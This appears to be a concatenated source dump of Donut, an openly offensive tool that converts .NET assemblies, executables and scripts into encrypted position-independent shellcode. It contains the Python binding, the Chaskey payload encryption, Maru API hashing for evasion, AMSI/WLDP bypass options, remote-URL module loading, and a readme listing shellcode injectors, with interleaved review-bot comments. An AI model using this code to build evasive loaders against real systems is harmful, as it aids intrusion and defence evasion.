231 | * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset. | |
232 | * payload/inject.exe: The compiled C shellcode injector | |
233 | * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing. | |
234 | * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible | |
235 | * payload/runsc.exe: The compiled C shellcode runner | |
236 | * payload/exe2h/exe2h.c: Source code for exe2h | |
237 | * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file | |
238 | * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption. | |
239 | * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing. | |
240 | ||
241 | # Subprojects | |
242 | ||
243 | There are three companion projects provided with donut: | |
244 | ||
245 | * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute. | |
246 | * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string. | |
247 | * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly. | |
248 | * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. | |
249 | ||
250 | # Project plan | |
251 | ||
252 | * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~ | |
253 | * Create a C# version of the generator. | |
254 | * Create a donut.py generator that uses the same command-line parameters as donut.exe. | |
255 | * Add support for HTTP proxies. | |
256 | ~~* Find ways to simplify the shellcode if possible.~~ | |
257 | * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it. | |
258 | * ~~Dynamic Calls to DLL functions.~~ | |
259 | * Handle the ProcessExit event from AppDomain using unmanaged code. | |
260 | ||
261 | Platform: UNKNOWN | |
262 | Requires-Python: >=3.0 | |
263 | Description-Content-Type: text/markdown |
0 | LICENSE | |
1 | MANIFEST.in | |
2 | Makefile | |
3 | Makefile.mingw | |
4 | Makefile.msvc | |
5 | README.md | |
6 | donut.c | |
7 | donutmodule.c | |
8 | encrypt.c | |
9 | hash.c | |
10 | setup.py | |
11 | version-release-notes.txt | |
12 | ./donut.c | |
13 | ./donutmodule.c | |
14 | ./encrypt.c | |
15 | ./hash.c | |
16 | ./DonutTest/hello.c | |
17 | ./DonutTest/testcase.c | |
18 | ./include/mmap-windows.c | |
19 | ./payload/activescript.c | |
20 | ./payload/bypass.c | |
21 | ./payload/clib.c | |
22 | ./payload/getpc.c | |
23 | ./payload/http_client.c | |
24 | ./payload/inject.c | |
25 | ./payload/inmem_dotnet.c | |
26 | ./payload/inmem_pe.c | |
27 | ./payload/inmem_script.c | |
28 | ./payload/inmem_xsl.c | |
29 | ./payload/payload.c | |
30 | ./payload/peb.c | |
31 | ./payload/runsc.c | |
32 | ./payload/wscript.c | |
33 | ./payload/exe2h/exe2h.c | |
34 | ./payload/exe2h/mmap-windows.c | |
35 | ./payload/test/api_test.c | |
36 | ./payload/test/call_api_dll.c | |
37 | ./payload/test/hello.c | |
38 | docs/2019-08-21-Python_Extension.md | |
39 | docs/2019-5-31-Apple-Fritter.md | |
40 | docs/2019-5-9-Introducing-Donut.md | |
41 | docs/api.html | |
42 | docs/api.md | |
43 | donut_shellcode.egg-info/PKG-INFO | |
44 | donut_shellcode.egg-info/SOURCES.txt | |
45 | donut_shellcode.egg-info/dependency_links.txt | |
46 | donut_shellcode.egg-info/top_level.txt | |
47 | donut_shellcode.egg-info/zip-safe | |
48 | include/donut.h | |
49 | include/encrypt.h | |
50 | include/hash.h | |
51 | include/mmap-windows.c | |
52 | include/mmap.h | |
53 | include/pe.h | |
54 | include/poppack.h | |
55 | include/pshpack1.h | |
56 | include/pshpack2.h | |
57 | include/pshpack4.h | |
58 | include/pshpack8.h | |
59 | include/wintypes.h | |
60 | lib/donut.h | |
61 | payload/Makefile.mingw | |
62 | payload/Makefile.msvc | |
63 | payload/activescript.c | |
64 | payload/activescript.h | |
65 | payload/amsi.h | |
66 | payload/bypass.c | |
67 | payload/call_api.asm | |
68 | payload/call_api_bin.h | |
69 | payload/clib.c | |
70 | payload/clr.h | |
71 | payload/getpc.c | |
72 | payload/http_client.c | |
73 | payload/inject.c | |
74 | payload/inmem_dotnet.c | |
75 | payload/inmem_pe.c | |
76 | payload/inmem_script.c | |
77 | payload/inmem_xsl.c | |
78 | payload/order.txt | |
79 | payload/payload.c | |
80 | payload/payload.h | |
81 | payload/payload_exe_x64.h | |
82 | payload/payload_exe_x86.h | |
83 | payload/peb.c | |
84 | payload/peb.h | |
85 | payload/runsc.c | |
86 | payload/winapi.h | |
87 | payload/wscript.c | |
88 | payload/wscript.h | |
89 | payload/xmldom.h | |
90 | payload/exe2h/Makefile | |
91 | payload/exe2h/Makefile.mingw | |
92 | payload/exe2h/Makefile.msvc | |
93 | payload/exe2h/exe2h.c | |
94 | payload/exe2h/exe2h.obj | |
95 | payload/exe2h/mmap-windows.c | |
96 | payload/exe2h/mmap-windows.obj | |
97 | payload/exe2h/mmap.h | |
98 | payload/test/api_test.c | |
99 | payload/test/call_api_dll.c | |
100 | payload/test/hello.c | |
101 | payload/test/hello.cs | |
102 | payload/test/rdt.cpp⏎ |
0 | donut |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Python C Extension by @byt3bl33d3r | |
6 | ||
7 | Redistribution and use in source and binary forms, with or without | |
8 | modification, are permitted provided that the following conditions are met: | |
9 | ||
10 | * Redistributions of source code must retain the above copyright notice, this | |
11 | list of conditions and the following disclaimer. | |
12 | ||
13 | * Redistributions in binary form must reproduce the above copyright notice, | |
14 | this list of conditions and the following disclaimer in the documentation | |
15 | and/or other materials provided with the distribution. | |
16 | ||
17 | * Neither the name of the copyright holder nor the names of its | |
18 | contributors may be used to endorse or promote products derived from | |
19 | this software without specific prior written permission. | |
20 | ||
21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
31 | */ | |
32 | ||
33 | #include <Python.h> | |
34 | #include "donut.h" | |
35 | ||
36 | ||
37 | static PyObject *Donut_Create(PyObject *self, PyObject *args, PyObject *keywds) { | |
38 | int *arch = NULL; | |
39 | int *bypass = NULL; | |
40 | char *appdomain = NULL; | |
41 | char *file = NULL; | |
42 | char *runtime = NULL; | |
43 | char *url = NULL; | |
44 | char *cls = NULL; | |
45 | char *method = NULL; | |
46 | char *params = NULL; | |
47 | ||
48 | int err; | |
49 | ||
50 | static char *kwlist[] = {"file", "url", "arch", "bypass", "cls", "method", "params", "runtime", "appdomain", NULL}; | |
51 | if (!PyArg_ParseTupleAndKeywords(args, keywds, "s|siisssss", kwlist, &file, &url, &arch, &bypass, &cls, &method, ¶ms, &runtime, &appdomain)) { | |
52 | return NULL; | |
53 | } | |
54 | ||
55 | DONUT_CONFIG c; | |
56 | ||
57 | // zero initialize configuration | |
58 | memset(&c, 0, sizeof(c)); | |
59 | ||
60 | // default type is position independent code for dual-mode (x86 + amd64) | |
61 | c.inst_type = DONUT_INSTANCE_PIC; | |
62 | c.arch = DONUT_ARCH_X84; | |
63 | c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails | |
64 | ||
65 | // target cpu architecture | |
66 | if (arch != NULL) { | |
67 | c.arch = arch; | |
68 | } | |
69 | ||
70 | // bypass options | |
71 | if (bypass != NULL) { | |
72 | c.bypass = bypass; | |
73 | } | |
74 | ||
75 | // name of appdomain to use | |
76 | if (appdomain != NULL) { | |
77 | strncpy(c.domain, appdomain, DONUT_MAX_NAME - 1); | |
78 | } | |
79 | ||
80 | // assembly to use | |
81 | if (file != NULL) { | |
82 | strncpy(c.file, file, DONUT_MAX_NAME - 1); | |
83 | } | |
84 | ||
85 | //runtime version to use | |
86 | if (runtime != NULL) { | |
87 | strncpy(c.runtime, runtime, DONUT_MAX_NAME - 1); | |
88 | } | |
89 | ||
90 | // url of remote assembly | |
91 | if (url != NULL) { | |
92 | strncpy(c.url, url, DONUT_MAX_URL - 2); | |
93 | c.inst_type = DONUT_INSTANCE_URL; | |
94 | } | |
95 | ||
96 | // class | |
97 | if (cls != NULL) { | |
98 | strncpy(c.cls, cls, DONUT_MAX_NAME - 1); | |
99 | } | |
100 | ||
101 | // method or exported api symbol | |
102 | if (method != NULL) { | |
103 | strncpy(c.method, method, DONUT_MAX_NAME - 1); | |
104 | } | |
105 | ||
106 | // parameters to method/exported API | |
107 | if (params != NULL) { | |
108 | strncpy(c.param, params, sizeof(c.param) - 1); | |
109 | } | |
110 | ||
111 | err = DonutCreate(&c); | |
112 | ||
113 | /* | |
114 | if (!(c.pic_len > 0)) { | |
115 | return NULL; | |
116 | } | |
117 | */ | |
118 | ||
119 | PyObject *shellcode = Py_BuildValue("y#", c.pic, c.pic_len); | |
120 | ||
121 | DonutDelete(&c); | |
122 | ||
123 | return shellcode; | |
124 | } | |
125 | ||
126 | // module's function table | |
127 | static PyMethodDef Donut_FunctionsTable[] = { | |
128 | { | |
129 | "create", // name exposed to Python | |
130 | Donut_Create, // C wrapper function | |
131 | METH_VARARGS|METH_KEYWORDS, | |
132 | "Calls DonutCreate to generate shellcode for a .NET assembly" // documentation | |
133 | }, { | |
134 | NULL, NULL, 0, NULL | |
135 | } | |
136 | }; | |
137 | ||
138 | // modules definition | |
139 | static struct PyModuleDef Donut_Module = { | |
140 | PyModuleDef_HEAD_INIT, | |
141 | "donut", // name of module exposed to Python | |
142 | "Donut Python C extension", // module documentation | |
143 | -1, | |
144 | Donut_FunctionsTable | |
145 | }; | |
146 | ||
147 | PyMODINIT_FUNC PyInit_donut(void) { | |
148 | return PyModule_Create(&Donut_Module); | |
149 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include "encrypt.h" | |
32 | ||
33 | static void chaskey(void *mk, void *p) { | |
34 | uint32_t i,*w=p,*k=mk; | |
35 | ||
36 | // add 128-bit master key | |
37 | for(i=0;i<4;i++) w[i]^=k[i]; | |
38 | ||
39 | // apply 16 rounds of permutation | |
40 | for(i=0;i<16;i++) { | |
41 | w[0] += w[1], | |
42 | w[1] = ROTR32(w[1], 27) ^ w[0], | |
43 | w[2] += w[3], | |
44 | w[3] = ROTR32(w[3], 24) ^ w[2], | |
45 | w[2] += w[1], | |
46 | w[0] = ROTR32(w[0], 16) + w[3], | |
47 | w[3] = ROTR32(w[3], 19) ^ w[0], | |
48 | w[1] = ROTR32(w[1], 25) ^ w[2], | |
49 | w[2] = ROTR32(w[2], 16); | |
50 | } | |
51 | // add 128-bit master key | |
52 | for(i=0;i<4;i++) w[i]^=k[i]; | |
53 | } | |
54 | ||
55 | // encrypt/decrypt data in counter mode | |
56 | void donut_encrypt(void *mk, void *ctr, void *data, size_t len) { | |
57 | uint8_t x[CIPHER_BLK_LEN], | |
58 | *p=(uint8_t*)data, | |
59 | *c=(uint8_t*)ctr; | |
60 | int i, r; | |
61 | ||
62 | while(len) { | |
63 | // copy counter+nonce to local buffer | |
64 | for(i=0;i<CIPHER_BLK_LEN;i++) | |
65 | x[i] = c[i]; | |
66 | ||
67 | // donut_encrypt x | |
68 | ENCRYPT(mk, &x); | |
69 | ||
70 | // XOR plaintext with ciphertext | |
71 | r = len > CIPHER_BLK_LEN ? CIPHER_BLK_LEN : len; | |
72 | ||
73 | for(i=0;i<r;i++) | |
74 | p[i] ^= x[i]; | |
75 | ||
76 | // update length + position | |
77 | len -= r; p += r; | |
78 | ||
79 | // update counter | |
80 | for(i=CIPHER_BLK_LEN;i>0;i--) | |
81 | if(++c[i-1]) break; | |
82 | } | |
83 | } | |
84 | ||
85 | #ifdef TEST | |
86 | ||
87 | #include <stdio.h> | |
88 | #include <string.h> | |
89 | #include <stdint.h> | |
90 | ||
91 | // 128-bit master key | |
92 | uint8_t key[16] = | |
93 | { 0x56, 0x09, 0xe9, 0x68, 0x5f, 0x58, 0xe3, 0x29, | |
94 | 0x40, 0xec, 0xec, 0x98, 0xc5, 0x22, 0x98, 0x2f }; | |
95 | ||
96 | // 128-bit plain text | |
97 | uint8_t plain[16]= | |
98 | { 0xb8, 0x23, 0x28, 0x26, 0xfd, 0x5e, 0x40, 0x5e, | |
99 | 0x69, 0xa3, 0x01, 0xa9, 0x78, 0xea, 0x7a, 0xd8 }; | |
100 | ||
101 | // 128-bit cipher text | |
102 | uint8_t cipher[16] = | |
103 | { 0xd5, 0x60, 0x8d, 0x4d, 0xa2, 0xbf, 0x34, 0x7b, | |
104 | 0xab, 0xf8, 0x77, 0x2f, 0xdf, 0xed, 0xde, 0x07 }; | |
105 | ||
106 | int main(void) { | |
107 | uint8_t data[16]; | |
108 | int equ; | |
109 | ||
110 | memcpy(data, plain, 16); | |
111 | chaskey(key, data); | |
112 | equ = (memcmp(data, cipher, 16)==0); | |
113 | printf("Chaskey test : %s\n", equ ? "OK" : "FAILED"); | |
114 | return 0; | |
115 | } | |
116 | ||
117 | #endif | |
118 |
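Review bot: In `donut_encrypt` the keystream buffer `uint8_t x[CIPHER_BLK_LEN]` is passed to `chaskey`, which reads and writes it through `uint32_t *w`, so the access is unaligned on strict targets and technically an aliasing violation everywhere. Declaring it `_Alignas(uint32_t) uint8_t x[CIPHER_BLK_LEN],` (or as a union of `uint8_t[16]` and `uint32_t[4]`) fixes both without changing the output. The word-wise view also makes the keystream depend on host byte order, so a generator built on a big-endian host would not produce what an x86 loader decrypts; if that is an accepted limitation, a comment at `chaskey` saying so would help. The `#ifdef TEST` driver only exercises the block permutation; one counter-mode vector for `donut_encrypt` that also checks `ctr` was advanced would cover the increment loop at `for(i=CIPHER_BLK_LEN;i>0;i--)`.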
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2017 Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include "hash.h" | |
32 | ||
33 | // SPECK-64/128 | |
34 | static uint64_t speck(void *mk, uint64_t p) { | |
35 | uint32_t k[4], i, t; | |
36 | union { | |
37 | uint32_t w[2]; | |
38 | uint64_t q; | |
39 | } x; | |
40 | ||
41 | // copy 64-bit plaintext to local buffer | |
42 | x.q = p; | |
43 | ||
44 | // copy 128-bit master key to local buffer | |
45 | for(i=0;i<4;i++) k[i]=((uint32_t*)mk)[i]; | |
46 | ||
47 | for(i=0;i<27;i++) { | |
48 | // encrypt 64-bit plaintext | |
49 | x.w[0] = (ROTR32(x.w[0], 8) + x.w[1]) ^ k[0]; | |
50 | x.w[1] = ROTR32(x.w[1],29) ^ x.w[0]; | |
51 | ||
52 | // create next 32-bit subkey | |
53 | t = k[3]; | |
54 | k[3] = (ROTR32(k[1], 8) + k[0]) ^ i; | |
55 | k[0] = ROTR32(k[0],29) ^ k[3]; | |
56 | k[1] = k[2]; k[2] = t; | |
57 | } | |
58 | // return 64-bit ciphertext | |
59 | return x.q; | |
60 | } | |
61 | ||
62 | uint64_t maru(const void *input, uint64_t iv) { | |
63 | uint64_t h; | |
64 | uint32_t len, idx, end; | |
65 | const char *api = (const char*)input; | |
66 | ||
67 | union { | |
68 | uint8_t b[MARU_BLK_LEN]; | |
69 | uint32_t w[MARU_BLK_LEN/4]; | |
70 | } m; | |
71 | ||
72 | // set H to initial value | |
73 | h = iv; | |
74 | ||
75 | for(idx=0, len=0, end=0;!end;) { | |
76 | // end of string or max len? | |
77 | if(api[len] == 0 || len == MARU_MAX_STR) { | |
78 | // zero remainder of M | |
79 | Memset(&m.b[idx], 0, MARU_BLK_LEN - idx); | |
80 | // store the end bit | |
81 | m.b[idx] = 0x80; | |
82 | // have we space in M for api length? | |
83 | if(idx >= MARU_BLK_LEN - 4) { | |
84 | // no, update H with E | |
85 | h ^= MARU_CRYPT(&m, h); | |
86 | // zero M | |
87 | Memset(&m, 0, MARU_BLK_LEN); | |
88 | } | |
89 | // store total length in bits | |
90 | m.w[(MARU_BLK_LEN/4)-1] = (len * 8); | |
91 | idx = MARU_BLK_LEN; | |
92 | end++; | |
93 | } else { | |
94 | // store character from api string | |
95 | m.b[idx] = (uint8_t)api[len]; | |
96 | idx++; len++; | |
97 | } | |
98 | if(idx == MARU_BLK_LEN) { | |
99 | // update H with E | |
100 | h ^= MARU_CRYPT(&m, h); | |
101 | // reset idx | |
102 | idx = 0; | |
103 | } | |
104 | } | |
105 | return h; | |
106 | } | |
107 | ||
108 | #ifdef TEST | |
109 | ||
110 | #include <stdio.h> | |
111 | #include <stdlib.h> | |
112 | #include <string.h> | |
113 | ||
114 | int main(int argc, char *argv[]) { | |
115 | ||
116 | uint64_t ulDllHash, ulApiHash, iv; | |
117 | char *api, *dll; | |
118 | ||
119 | if(argc != 4) { | |
120 | printf("\nusage: maru <iv> <dll> <api>\n"); | |
121 | return 0; | |
122 | } | |
123 | ||
124 | // convert hexadecimal IV to binary | |
125 | iv = strtoull(argv[1], NULL, 16); | |
126 | dll = argv[2]; | |
127 | api = argv[3]; | |
128 | ||
129 | printf("\nIV : %p\n", (void*)iv); | |
130 | ||
131 | ulDllHash = maru(dll, iv); | |
132 | printf("DLL : %p\n", (void*)ulDllHash); | |
133 | ||
134 | ulApiHash = maru(api, iv) + ulDllHash; | |
135 | printf("API : %p\n", (void*)ulApiHash); | |
136 | ||
137 | return 0; | |
138 | } | |
139 | #endif |
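Review bot: The `#ifdef TEST` driver prints the 64-bit IV and hashes with `%p` after casting `uint64_t` to `void*`, which truncates the value on a 32-bit build and is not a portable way to format an integer; use `<inttypes.h>`, e.g. `printf("\nIV : %016" PRIx64 "\n", iv);` for the three `printf` calls, adding `#include <inttypes.h>` to the test includes. `strtoull(argv[1], NULL, 16)` also accepts a malformed IV silently; checking the end pointer and `errno` keeps a typo from producing hashes for the wrong IV. In `maru` itself input is cut at `len == MARU_MAX_STR`, so names sharing a 64-byte prefix hash identically — a one-line comment above the loop stating that limit would save readers of the loader a surprise.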
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef DONUT_H | |
32 | #define DONUT_H | |
33 | ||
34 | #include <stdint.h> | |
35 | #include <stdio.h> | |
36 | #include <stdlib.h> | |
37 | #include <string.h> | |
38 | #include <sys/stat.h> | |
39 | #include <inttypes.h> | |
40 | #include <fcntl.h> | |
41 | ||
42 | #if defined(_WIN32) || defined(_WIN64) | |
43 | #define WINDOWS | |
44 | #include <windows.h> | |
45 | #ifndef PAYLOAD_H | |
46 | #include "mmap.h" | |
47 | #endif | |
48 | #if defined(_MSC_VER) | |
49 | #pragma comment(lib, "advapi32.lib") | |
50 | #endif | |
51 | #else | |
52 | #define LINUX | |
53 | #include <unistd.h> | |
54 | #include <sys/types.h> | |
55 | #include <sys/mman.h> | |
56 | #include "pe.h" | |
57 | #endif | |
58 | ||
59 | #ifndef PAYLOAD_H | |
60 | ||
61 | #if defined(DEBUG) | |
62 | #define DPRINT(...) { \ | |
63 | fprintf(stderr, "DEBUG: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \ | |
64 | fprintf(stderr, __VA_ARGS__); \ | |
65 | fprintf(stderr, "\n"); \ | |
66 | } | |
67 | #else | |
68 | #define DPRINT(...) // Don't do anything in release builds | |
69 | #endif | |
70 | ||
71 | #endif | |
72 | ||
73 | #if !defined(NOCRYPTO) | |
74 | #include "hash.h" // api hashing | |
75 | #include "encrypt.h" // symmetric encryption of instance+module | |
76 | #endif | |
77 | ||
78 | #if !defined(WINDOWS) | |
79 | #define strnicmp(x,y,z) strncasecmp(x,y,z) | |
80 | typedef uint64_t ULONG64, *PULONG64; | |
81 | typedef uint32_t DWORD, *PDWORD; | |
82 | typedef uint16_t WORD, *PWORD; | |
83 | typedef uint8_t BYTE, *PBYTE; | |
84 | ||
85 | typedef char CHAR, *PCHAR; | |
86 | typedef size_t SIZE_T; | |
87 | ||
88 | typedef struct _GUID { | |
89 | DWORD Data1; | |
90 | WORD Data2; | |
91 | WORD Data3; | |
92 | BYTE Data4[8]; | |
93 | } GUID; | |
94 | #endif | |
95 | ||
96 | #define DONUT_KEY_LEN CIPHER_KEY_LEN | |
97 | #define DONUT_BLK_LEN CIPHER_BLK_LEN | |
98 | ||
99 | #define DONUT_ERROR_SUCCESS 0 | |
100 | #define DONUT_ERROR_FILE_NOT_FOUND 1 | |
101 | #define DONUT_ERROR_FILE_EMPTY 2 | |
102 | #define DONUT_ERROR_FILE_ACCESS 3 | |
103 | #define DONUT_ERROR_FILE_INVALID 4 | |
104 | #define DONUT_ERROR_NET_PARAMS 5 | |
105 | #define DONUT_ERROR_NO_MEMORY 6 | |
106 | #define DONUT_ERROR_INVALID_ARCH 7 | |
107 | #define DONUT_ERROR_INVALID_URL 8 | |
108 | #define DONUT_ERROR_URL_LENGTH 9 | |
109 | #define DONUT_ERROR_INVALID_PARAMETER 10 | |
110 | #define DONUT_ERROR_RANDOM 11 | |
111 | #define DONUT_ERROR_DLL_FUNCTION 12 | |
112 | #define DONUT_ERROR_ARCH_MISMATCH 13 | |
113 | #define DONUT_ERROR_DLL_PARAM 14 | |
114 | #define DONUT_ERROR_BYPASS_INVALID 15 | |
115 | ||
116 | // target architecture | |
117 | #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files | |
118 | #define DONUT_ARCH_X86 1 // x86 | |
119 | #define DONUT_ARCH_X64 2 // AMD64 | |
120 | #define DONUT_ARCH_X84 3 // AMD64 + x86 | |
121 | ||
122 | // module type | |
123 | #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method | |
124 | #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided | |
125 | #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional | |
126 | #define DONUT_MODULE_EXE 4 // Unmanaged EXE | |
127 | #define DONUT_MODULE_VBS 5 // VBScript | |
128 | #define DONUT_MODULE_JS 6 // JavaScript or JScript | |
129 | #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded | |
130 | ||
131 | // instance type | |
132 | #define DONUT_INSTANCE_PIC 1 // Self-contained | |
133 | #define DONUT_INSTANCE_URL 2 // Download from remote server | |
134 | ||
135 | // AMSI/WLDP options | |
136 | #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP | |
137 | #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running | |
138 | #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running | |
139 | ||
140 | // apparently C# can support 2^16 or 65,536 parameters | |
141 | // we support up to eight for now :) | |
142 | // Changing these would require updating call_api.asm for unmanaged EXE/DLL | |
143 | #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method | |
144 | #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names | |
145 | #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance | |
146 | #define DONUT_MAX_URL 256 | |
147 | #define DONUT_MAX_MODNAME 8 | |
148 | #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok | |
149 | #define DONUT_VER_LEN 32 | |
150 | #define DONUT_DOMAIN_LEN 8 | |
151 | ||
152 | #define DONUT_RUNTIME_NET2 "v2.0.50727" | |
153 | #define DONUT_RUNTIME_NET4 "v4.0.30319" | |
154 | ||
155 | #define NTDLL_DLL "ntdll.dll" | |
156 | #define KERNEL32_DLL "kernel32.dll" | |
